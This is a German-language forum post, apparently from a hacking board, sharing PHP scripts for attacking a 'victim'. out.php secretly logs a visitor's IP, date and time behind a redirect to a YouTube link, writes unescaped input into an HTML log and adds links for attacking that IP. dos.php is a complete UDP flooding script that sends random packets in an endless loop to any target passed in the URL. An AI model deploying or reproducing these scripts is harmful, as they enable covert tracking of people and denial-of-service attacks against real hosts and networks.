So hab mich mal bissl nützlich gemacht und ein warscheinlich unnützes PHP Script geschrieben um die IP Adresse eines Victims rauszubekommen.

Funktionsweise:

Ihr gebt dem Victim eine Url per out.php?url=http://de.youtube.com/watch?v=qi_BX5cmreE über. Das Victim sieht nur diese Seite hier
http://de.youtube.com/watch?v=qi_BX5cmreE. Im Hintergrund wurde die IP geloggt in "iplog/ip.html" .

Wenn ihr die ip.html aufruft seht ihr die

die Zeit des Logs
das Datum des Logs
die IP des Victims

Außerdem sind gleich links generiert worden um eine

dos-attacke über euren PHP Server auszuführen
ein whois, trace oder scan durch Netcraft zu machen.

Ich versichere euch das es nicht verseucht ist =)

Entweder ihr ladet euch das script bei Rapidshare runter (ignoriert die "rs-punkt" Datei die ist nur da damit ich ein paar Punkte bei Rapidshare kriege um das Archiv zu vergrößern )

Downloadlink: http://rapidshare.com/files/14140572...4free-hack.zip


oder ihr benutzt den Code hier :

out.php

Code:
<?php
//logfile adresse
$logfile = "iplog/ip.html";

//IP
$ip = $_SERVER['REMOTE_ADDR'];

//Zeit 
$zeit = date("H:i:s");

//Datum
$datum = date("d.m.Y");

//IP Log
$text = "Neue IP geloggt - [".$ip."] am [".$datum."] um [".$zeit."] Uhr | Weiterleitung f&uuml;hrte zu [url='".$_GET[url]."']".$_GET." | IP DOS | whois | Trace Netcraft Scan
";


$fp = fopen($logfile, "a");

fwrite($fp, $text);

fclose($fp); 

//Weiterleitung

if($_GET[url]==NULL){

		echo "Und wohin soll ich jetzt weiterleiten du Ei?";

}else{

		header("Location: ".$_GET[url]."");

}


?>


dos.php

Code:
<?php
if (!$_GET['target'])
   die('Kein  Ziel angegeben!');

$target = $_GET['target'];
$sock = socket_create(AF_INET,SOCK_DGRAM,SOL_UDP);

if(!$sock)
  die(__LINE__);

$data='';

for ($i=0;$i<1400;$i++)
{
  $data.=chr(rand(0,255));
}

while(true)
{
  if (!socket_sendto($sock,$data,strlen($data),0,$target,9))
    die(__LINE__);
$time = date("H:i:s");
echo("$time | DOS läuft
");
}
?>
Hoffe konnte bissl helfen =)